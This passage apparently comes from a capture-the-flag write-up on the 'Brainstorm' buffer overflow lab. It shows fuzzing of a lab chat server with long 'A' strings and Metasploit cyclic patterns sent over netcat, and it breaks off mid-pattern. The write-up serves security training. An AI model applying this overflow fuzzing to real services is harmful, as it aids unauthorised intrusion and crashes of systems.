Write a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Even though the Username says a maximum of 20 characters, with large input to the username a crash was not observed. However a crash was observed when a large input is provided to the message.

Generating pattern using metasploit scripts:

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_create -l 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

Write a message: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

Tue Feb 07 13:29:35 2023
Aa0Aa1Aa2Aa3Aa4Aa5Aa said: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

Write a message:

No crash observed with 2000 characters.

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_create -l 2400
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu